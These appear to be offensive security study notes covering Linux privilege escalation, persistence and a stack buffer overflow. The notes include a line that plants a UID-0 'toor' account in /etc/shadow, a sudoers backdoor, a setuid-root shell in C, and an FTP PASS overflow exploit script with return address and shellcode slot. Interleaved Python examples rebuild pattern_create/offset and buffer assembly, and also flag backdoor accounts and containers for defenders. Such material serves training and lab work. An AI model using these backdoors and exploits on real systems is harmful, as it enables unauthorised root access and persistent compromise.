echo 'toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' >>/etc/shadow
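Added example, not from the notes: the file formats the two commands above write, parsed in Python so you can combine passwd and shadow the way unshadow does for john (see the tip further up) and, from the defender's side, spot the traces these backdoors leave. The sample files and hashes are constructed; the last two passwd lines are the two backdoors shown above.

```python
# Constructed sample files (hashes are placeholders, not real SHA-512 crypt output).
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1001:1001:Bob:/home/bob:/bin/bash
dummy::0:0::/root:/bin/bash
toor:x:0:0:root:/root:/bin/bash
"""

SHADOW = """root:$6$saltsalt$ROOTHASHDEMO:17500:0:99999:7:::
daemon:*:17500:0:99999:7:::
bob:$6$saltsalt$BOBHASHDEMO:17500:0:99999:7:::
toor:$6$saltsalt$TOORHASHDEMO:14798:0:99999:7:::
"""


def parse_passwd(text):
    """name -> fields of each well-formed 7-field passwd line."""
    users = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            continue
        users[f[0]] = {"pw": f[1], "uid": int(f[2]), "gid": int(f[3]),
                       "gecos": f[4], "home": f[5], "shell": f[6]}
    return users


def parse_shadow(text):
    """name -> hash field (second column) of each 9-field shadow line."""
    return {line.split(":")[0]: line.split(":")[1]
            for line in text.splitlines() if line.count(":") >= 8}


def unshadow(passwd_text, shadow_text):
    """What unshadow(8) produces for john: every passwd line with the password
    field replaced by the hash from shadow when the user has a shadow entry."""
    hashes = parse_shadow(shadow_text)
    out = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[0] in hashes:
            f[1] = hashes[f[0]]
        out.append(":".join(f))
    return "\n".join(out) + "\n"


def suspicious_accounts(passwd_text, shadow_text=""):
    """Flag what the two backdoors above leave behind: extra UID 0 users,
    an empty password field in passwd, or an empty hash in shadow."""
    hashes = parse_shadow(shadow_text)
    findings = []
    for name, u in parse_passwd(passwd_text).items():
        if u["uid"] == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        if u["pw"] == "":
            findings.append((name, "empty password field in passwd (login without password)"))
        if hashes.get(name) == "":
            findings.append((name, "empty password in shadow"))
    return findings


if __name__ == "__main__":
    print(unshadow(PASSWD, SHADOW))
    for name, why in suspicious_accounts(PASSWD, SHADOW):
        print(name, "-", why)
```

The same checks work on a live box with `open("/etc/passwd").read()` and (as root) `open("/etc/shadow").read()`; an empty second field in passwd bypasses shadow entirely, which is why the dummy line above needs no hash at all.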

msf exploit(handler) > run post/multi/recon/local_exploit_suggester

if we have euid set to 1001 python -c 'import os,pty; os.setresuid(1001,1001,1001); pty.spawn("/bin/bash")'

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
	setuid(0); setgid(0);   /* setregid(0,0); setegid(0); if only the effective ids are 0. To check, run ./<escalated binary> and then id */
	system("/bin/bash");
	return 0;
}

Maintaining privilege: echo "userName ALL=(ALL:ALL) ALL" >> /etc/sudoers, then use sudo su from user userName



Immunity Debugger

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

root@kali:~/labs/614# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
nasm > add eax,12
00000000  83C00C            add eax,byte +0xc

!mona modules
!mona find -s "\xff\xe4" -m SLMFC.DLL

Write the return address into the script little-endian (x86):

Python script (Python 2)

import socket

host = ''                          # target IP
port = 0                           # target port

#string = "A"*2700                 # initial crash with the cyclic pattern
string = "A"*2606                  # offset to EIP found with pattern_offset
string += "\xE3\x41\x4B\x5F"       # return address (JMP ESP), little-endian
buf = "\x90"*20                    # NOPs to allow decoding
string += buf
#string += shellcode               # msfvenom output goes here

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	s.send('USER test\r\n')
	s.send('PASS ' + string + '\r\n')
	s.close()
except:
	print('Unable to connect')
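Added example, not from the original notes: a Python re-implementation of what pattern_create.rb and pattern_offset.rb do, plus the little-endian packing and bad-character check used when assembling the buffer above. The crash value 0x39694438 from the pattern_offset line resolves to offset 2606, which is the padding the script uses; 0x5F4B41E3 is simply the address the script's four bytes encode and is not claimed here to be a real JMP ESP location.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Same sequence as pattern_create.rb: Aa0Aa1Aa2...Aa9Ab0... Every 3-byte
    group is unique for 20280 bytes, so any 4 bytes that land in EIP map back
    to exactly one offset."""
    chunks, total = [], 0
    while total < length:
        for up in UPPER:
            for lo in LOWER:
                for d in DIGITS:
                    chunks.append(up + lo + d)
                    total += 3
                    if total >= length:
                        return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, pattern_length=20280):
    """pattern_offset.rb -q <hex>: EIP holds the bytes little-endian, so
    0x39694438 means the bytes in memory were b'8Di9'. Returns -1 if absent."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(pattern_length).encode("ascii").find(needle)


def pack_ret(addr):
    """Return address as it must appear in the exploit string (x86 little-endian)."""
    return struct.pack("<I", addr)


def bad_chars_present(data, bad=b"\x00\x0a\x0d"):
    """Which of the bytes excluded with msfvenom -b still occur in data."""
    return sorted({b for b in data if b in bad})


def build_buffer(offset, ret_addr, shellcode, nop_len=20):
    """Layout used by the script above: padding up to EIP, return address,
    NOP sled, then the (encoded) shellcode."""
    bad = bad_chars_present(shellcode)
    if bad:
        raise ValueError("shellcode contains bad chars: %r" % bad)
    return b"A" * offset + pack_ret(ret_addr) + b"\x90" * nop_len + shellcode


if __name__ == "__main__":
    off = pattern_offset(0x39694438)        # EIP value seen after sending pattern_create(2700)
    print("offset:", off)                    # 2606
    print("ret bytes:", pack_ret(0x5F4B41E3))
    print("buffer length:", len(build_buffer(off, 0x5F4B41E3, b"\xcc" * 4)))
```

Because the pattern is generated deterministically, pattern_offset also works on partial overwrites: pack the four bytes you actually see in EIP and search for them, exactly as pattern_offset.rb does.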


edb --run /usr/games/crossfire/bin/crossfire

strings <filename>
OllyDbg (Windows)
F2 - toggle breakpoint
F7 - step into
F8 - step over

objdump -d file will dump assembly


Get path of container in host file structure:

docker_path=/proc/$(docker inspect --format '{{.State.Pid}}' <ContainerID>)/root

Transfer a docker image to the host: on kali run docker save uzyexe/nmap -o nmap.tar, copy the tar to the target, then:

docker load --input nmap.tar
docker run --network=br0 -it --rm uzyexe/nmap -sn -T4 -v > scan.out &

Identify if you are inside a container: cat /proc/self/cgroup | grep docker
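Added example, not from the notes: the grep-docker check above as a small parser of /proc/self/cgroup, extended to other runtimes' cgroup paths and to the /.dockerenv marker, because on cgroup v2 hosts the file is often just "0::/" and the grep finds nothing. The sample file contents are constructed.

```python
import os

# Constructed /proc/self/cgroup contents for the three common cases.
CGROUP_V1_DOCKER = (
    "12:pids:/docker/3c8a1b2c3d4e5f60718293a4b5c6d7e8f9\n"
    "11:memory:/docker/3c8a1b2c3d4e5f60718293a4b5c6d7e8f9\n"
    "1:name=systemd:/docker/3c8a1b2c3d4e5f60718293a4b5c6d7e8f9\n"
)
CGROUP_V1_HOST = "12:pids:/user.slice/user-1000.slice\n11:memory:/\n1:name=systemd:/init.scope\n"
CGROUP_V2 = "0::/\n"   # what a container on a cgroup v2 host typically shows

CONTAINER_MARKERS = ("docker", "containerd", "kubepods", "lxc")


def cgroup_says_container(cgroup_text):
    """The grep-docker check above, generalised to other runtimes' cgroup paths."""
    for line in cgroup_text.splitlines():
        fields = line.split(":", 2)          # hierarchy-id:controllers:path
        if len(fields) == 3 and any(k in fields[2] for k in CONTAINER_MARKERS):
            return True
    return False


def looks_like_container(cgroup_text, dockerenv_exists):
    """Combine both signals: under cgroup v2 the cgroup path carries no hint,
    so the /.dockerenv marker file is what gives the container away."""
    return cgroup_says_container(cgroup_text) or dockerenv_exists


def check_this_host():
    try:
        with open("/proc/self/cgroup") as fh:
            text = fh.read()
    except OSError:
        text = ""
    return looks_like_container(text, os.path.exists("/.dockerenv"))


if __name__ == "__main__":
    print("inside container:", check_this_host())
```

Neither signal is authoritative: a container image can delete /.dockerenv and runtimes name their cgroups differently, so treat a negative result as "no evidence" rather than proof you are on bare metal.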